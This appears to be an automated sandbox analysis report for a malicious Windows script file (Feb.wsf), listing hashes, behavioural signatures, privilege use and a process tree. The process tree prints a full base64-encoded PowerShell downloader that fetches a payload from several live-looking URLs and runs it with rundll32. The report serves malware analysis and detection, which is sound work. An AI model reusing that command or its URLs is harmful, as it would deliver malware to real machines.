Resubmissions
01-08-2023 11:40
230801-nsw4nagf4y 821-04-2023 15:45
230421-s7bhqage68 821-04-2023 15:10
230421-skcr9sgc43 8Analysis
-
max time kernel
386s -
max time network
387s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
21-04-2023 15:45
Static task
static1
Behavioral task
behavioral1
Sample
file/Feb.wsf
Resource
win10-20230220-en
windows10-1703-x64
10 signatures
600 seconds
General
-
Target
file/Feb.wsf
-
Size
290KB
-
MD5
20e65f83fcbe1f10fb6cf6a29ab55a65
-
SHA1
a79c622dc5787025ce5c01ae9415c2df413d801a
-
SHA256
b396786fcbae38eb8d4d481bf05c42cdf8ef34cd2b0a81eb38b2c7c10b7ce3b6
-
SHA512
9d855840c0ee3d3625844dfe9890baff82248cc0296405a11b88add330763e8410d475467c2d0f79f559dde547e700674a6f2ca75bb70bfac3ca4ebbe128d9ad
-
SSDEEP
6144:vaG7zwUsHDxO3yHfgrogRcarC6Mq7VFyr0idubJTxPbdj9:Sdd/n0NDdx
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 8 IoCs
flow pid Process 2 4620 powershell.exe 5 4620 powershell.exe 7 4620 powershell.exe 11 4620 powershell.exe 14 4620 powershell.exe 17 4620 powershell.exe 21 4620 powershell.exe 25 4620 powershell.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\rescache\_merged\4183903823\810424605.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\3877292338.pri taskmgr.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4620 powershell.exe 4620 powershell.exe 4620 powershell.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4820 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4620 powershell.exe Token: SeDebugPrivilege 4820 taskmgr.exe Token: SeSystemProfilePrivilege 4820 taskmgr.exe Token: SeCreateGlobalPrivilege 4820 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe 4820 taskmgr.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1020 wrote to memory of 4620 1020 WScript.exe 67 PID 1020 wrote to memory of 4620 1020 WScript.exe 67 PID 3564 wrote to memory of 5076 3564 cmd.exe 73 PID 3564 wrote to memory of 5076 3564 cmd.exe 73 PID 3564 wrote to memory of 5064 3564 cmd.exe 75 PID 3564 wrote to memory of 5064 3564 cmd.exe 75
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file\Feb.wsf"1⤵
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQAYQBkAGEAbQBpAGMAYQBsAGwAeQBVAG4AdABlAHMAdABpAGYAeQBpAG4AZwAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAGMAYQByAGwAYQBkAHYAbwBnAGEAZABhAHQAcgBpAGIAdQB0AGEAcgBpAGEALgBjAG8AbQAvAHQAdgBuAHEAOQAvAEYAUAA0AGkAcQBEAEIAawBSADgAMQAsAGgAdAB0AHAAcwA6AC8ALwBnAHMAcwBjAG8AcgBwAG8AcgBhAHQAaQBvAG4AbAB0AGQALgBjAG8AbQAvAG8AawBTAGYAagAvAHMAVwB3ADcAVQA3AFcATwAsAGgAdAB0AHAAcwA6AC8ALwBtAHIAYwByAGkAegBxAHUAbgBhAC4AYwBvAG0ALwBMADcAYwBjAE4ALwBHAEgAdwAzADEAYQAsAGgAdAB0AHAAcwA6AC8ALwBjAGkAdAB5AHQAZQBjAGgALQBzAG8AbAB1AHQAaQBvAG4AcwAuAGMAbwBtAC8ANgBNAGgAMQBrAC8AOQBEAEYAMABBAFEARwBoAFoAcABqAGMALABoAHQAdABwAHMAOgAvAC8AZQByAGcALQBlAGcALgBjAG8AbQAvAG8AYwBtAGIALwBVAEcAegAxAEcAaAB3AFQALABoAHQAdABwAHMAOgAvAC8AegBhAGkAbgBjAG8ALgBuAGUAdAAvAE8AZABPAFUALwBPADMAQQBrAGIAUwBnACwAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbABsAG8AcwBtAGkAcgB0AG8AcwAuAGMAbwBtAC8AcwBqAG4ALwB3AFUAVwBFAG8AMQBiADEASQB1AFkALABoAHQAdABwAHMAOgAvAC8AbgBhAHkAYQBkAG8AZgBvAHUAbgBkAGEAdABpAG8AbgAuAG8AcgBnAC8AdwBYAGEASwBtAC8AZABWAFoANQBRAGwAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAaQBzAG0AYQBlAGwAaQB0AGUARABlAGYAbwByAGUAcwB0AHMAIABpAG4AIAAkAGEAZABhAG0AaQBjAGEAbABsAHkAVQBuAHQAZQBzAHQAaQBmAHkAaQBuAGcAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAGkAcwBtAGEAZQBsAGkAdABlAEQAZQBmAG8AcgBlAHMAdABzACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA2ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABDAHUAcgBhAHIAZQAuAGQAbwBwAGkAZQByADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAQwB1AHIAYQByAGUALgBkAG8AcABpAGUAcgApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBOAG8ATABvAGcAbwAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAUQBBAFIAUQBCAE4AQQBGAEEAQQBYAEEAQgBEAEEASABVAEEAYwBnAEIAaABBAEgASQBBAFoAUQBBAHUAQQBHAFEAQQBiAHcAQgB3AEEARwBrAEEAWgBRAEIAeQBBAEMAdwBBAFQAUQBCAHYAQQBIAFEAQQBaAEEAQQA3AEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADUAOwB9AH0A"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4620
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4428
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3564 -
C:\Windows\system32\rundll32.exerundll32 Curare.dopier,Motd2⤵PID:5076
-
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\Curare.dopier,Motd2⤵PID:5064
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4820
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a